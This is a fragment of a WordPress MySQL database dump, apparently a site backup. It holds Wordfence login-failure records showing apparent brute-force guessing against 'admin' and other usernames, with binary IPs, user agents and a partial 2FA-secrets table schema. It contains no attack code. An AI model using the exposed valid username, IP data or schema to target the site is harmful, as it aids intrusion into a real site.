Safari/537.36'),(5912,10802,1630661194.650751,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5913,10843,1630671367.268323,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/jɆ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5914,10854,1630674536.690587,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0����r','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5915,10858,1630675083.971174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.ePS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5916,10874,1630681952.811533,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5917,10878,1630682645.414346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5918,10979,1630723101.077242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5919,10983,1630725208.048143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.i|b','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5920,10983,1630725212.888810,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.i|b','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5921,11046,1630739241.971217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(5922,11142,1630755126.858362,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5923,11348,1630806666.316394,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�<','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5924,11408,1630835507.983647,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�D','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(5925,11414,1630848165.706820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�g','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5926,11417,1630851238.178911,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�D','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53'),(5927,11431,1630871797.538789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5928,11435,1630880546.050297,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���*t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52'),(5929,11437,1630886720.335819,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�E','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5930,11475,1630932585.735025,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0'),(5931,11482,1630934168.468228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���r��','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5932,11482,1630934168.516430,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���r��','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5933,11488,1630939745.325582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(5934,11533,1630994851.054530,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��h�I\r','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15'),(5935,11538,1630998493.305855,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5936,11542,1630999511.623507,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�K','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),(5937,11550,1631001538.016118,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gyY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5938,11571,1631019564.567029,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(5939,11588,1631026457.680824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5940,11620,1631034756.767736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_�','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5941,11762,1631078783.604657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5942,11763,1631078799.653393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��S�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5943,11799,1631098818.851734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5944,11800,1631098819.546604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5945,11801,1631098820.217205,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5946,11802,1631098821.196642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5947,11803,1631098821.893932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5948,11804,1631098822.636815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5949,11805,1631098823.473847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5950,11806,1631098824.423635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5951,11807,1631098825.079325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5952,11808,1631098825.871553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5953,11808,1631098825.938202,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5954,11809,1631098826.764067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5955,11810,1631098827.667690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5956,11810,1631098827.723112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5957,11811,1631098828.425961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5958,11812,1631098829.104652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5959,11813,1631098829.785696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5960,11814,1631098830.774816,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5961,11815,1631098831.850988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�$�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5962,11821,1631103385.467166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^>�','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5963,11844,1631116219.296001,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�F','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),(5964,11857,1631120239.105584,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�<�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(5965,11907,1631132493.631112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5966,11944,1631143303.958904,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5967,11963,1631148657.084465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5968,11967,1631155381.010147,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�C','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(5969,12010,1631231176.549090,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���D','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(5970,12011,1631247377.752189,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��iG��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5971,12012,1631247381.298005,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��iG��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5972,12017,1631280022.680486,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�D','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(5973,12035,1631297770.965243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Aێ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5974,12035,1631297771.038857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Aێ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5975,12075,1631319829.471037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5976,12120,1631341394.455314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5977,12126,1631344486.396962,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5978,12134,1631350378.460089,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����V','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5979,12139,1631351677.561980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5980,12152,1631359497.711011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5981,12193,1631368757.082880,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0����r','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(5982,12222,1631382515.945693,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15'),(5983,12271,1631418908.179474,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5984,12315,1631429439.177929,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ŝ','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5985,12337,1631434261.395386,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��%�\'~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5986,12339,1631434483.262591,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��3�+�','Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)'),(5987,12359,1631438296.233031,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5988,12367,1631439805.734329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5989,12369,1631440339.919632,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��y+�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5990,12373,1631441340.977232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��oZ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5991,12382,1631442406.569307,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��)�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5992,12411,1631447227.534086,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5993,12419,1631448894.497719,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5994,12423,1631449949.600489,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5995,12424,1631450081.834577,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5996,12449,1631455820.804917,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��MD ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5997,12452,1631456376.891808,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5998,12459,1631458101.922503,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5999,12466,1631461656.717191,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mꠙ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6000,12474,1631463933.253421,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6001,12476,1631464556.478339,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6002,12480,1631466541.190488,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6003,12496,1631472038.653681,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ν.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6004,12502,1631474927.307636,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6005,12508,1631476217.398710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�Ub','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6006,12517,1631479817.436308,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����)D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6007,12524,1631483771.291057,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(6008,12536,1631487873.087147,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ǧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6009,12538,1631488563.706854,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��h�\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6010,12541,1631489945.291143,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6011,12543,1631490580.075535,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���\"��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6012,12545,1631491239.408360,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6013,12548,1631492413.545673,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6014,12549,1631493044.045474,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6015,12553,1631495131.484404,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��oZ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6016,12555,1631495724.373422,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ge�Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6017,12558,1631497106.030717,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��_o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6018,12560,1631498367.132724,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6019,12562,1631499081.871468,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6020,12565,1631500477.005533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\">T','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(6021,12566,1631501127.976884,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6022,12569,1631503149.634640,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�<F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6023,12574,1631505650.221458,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���јs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6024,12576,1631505664.197041,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�E','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6025,12581,1631506931.856170,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0����r','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(6026,12584,1631507705.106539,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g|^,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6027,12591,1631514069.618642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(6028,12630,1631579175.429837,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���dW�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15'),(6029,12656,1631612774.448042,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
